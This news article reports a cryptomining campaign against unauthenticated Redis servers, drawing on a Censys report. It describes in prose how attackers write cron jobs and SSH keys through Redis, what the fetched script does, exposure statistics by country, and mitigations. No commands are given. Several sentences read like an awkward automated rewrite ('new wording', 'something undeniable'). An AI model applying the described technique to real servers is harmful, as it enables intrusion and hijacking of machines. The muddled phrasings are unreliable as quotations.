An unknown attacker has targeted tens of thousands of unauthenticated Redis servers exposed across the internet in an effort to install a cryptocurrency miner.
It is not immediately clear whether all of these hosts were successfully compromised. However, this was made possible by a “lesser known technique” designed to trick servers into writing data to arbitrary files – a case of unauthorized access which was first documented in September 2018.
“The general idea behind this exploit technique is to configure Redis to write its file-based database to a directory containing a method to authorize a user (like adding a key to ‘.ssh/authorized_keys’), or start a process (like adding a script to ‘/etc/cron.d’)”, Censys said in a new wording.
The attack surface management platform said it discovered evidence (i.e. Redis commands) indicating efforts by part of the attacker to store malicious material. crontab entries in the “/var/spool/cron/root” file, resulting in the execution of a shell script hosted on a remote server.
The shell script, which is always accessible, is designed to perform the following actions:
- Terminate processes related to system security and monitoring
- Purge log files and command histories
- Add a new SSH key (“backup1”) to the root user fileauthorized_keys to enable remote access
- Disable iptables firewall
- Install scanning tools like masscan, and
- Install and run the XMRig cryptocurrency mining application
The SSH key was reportedly set on 15,526 of the 31,239 unauthenticated Redis servers, suggesting that the attack was attempted on “more than 49% of known unauthenticated Redis servers on the internet”.
However, one of the main reasons why this attack could fail is that the Redis service must be run with elevated permissions (i.e. root) in order to allow the adversary to write to the cron directory. aforementioned.
“Although this might be the case when running Redis in a container (like docker), where the process might see itself running as root and allowing the attacker to write those files,” wrote said the Censys researchers. “But in this case, only the container is affected, not the physical host.”
The Censys report also revealed that there are approximately 350,675 Internet-accessible Redis database services spanning 260,534 unique hosts.
“While most of these services require authentication, 11% (39,405) do not,” the company said, adding that “of the total 39,405 unauthenticated Redis servers we observed, exposure potential of the data is greater than 300 gigabytes”.
The top 10 countries with exposed and unauthenticated Redis services are China (20,011), United States (5,108), Germany (1,724), Singapore (1,236), India (876), France (807), Japan (711), Hong Kong (512), the Netherlands (433) and Ireland (390).
China also leads in terms of the amount of data exposed per country, accounting for 146 gigabytes of data, with the United States trailing far behind at around 40 gigabytes.
Censys said it also found numerous instances of misconfigured Redis services, noting that “Israel is one of the only regions where the number of misconfigured Redis servers exceeds the number of properly configured servers.”
To mitigate threatsusers are advised to enable client authentication, configure Redis to only run on internal network interfaces, prevent misuse of the CONFIG command by renaming it to something undeniable and configure firewalls to accept Redis connections only from trusted hosts.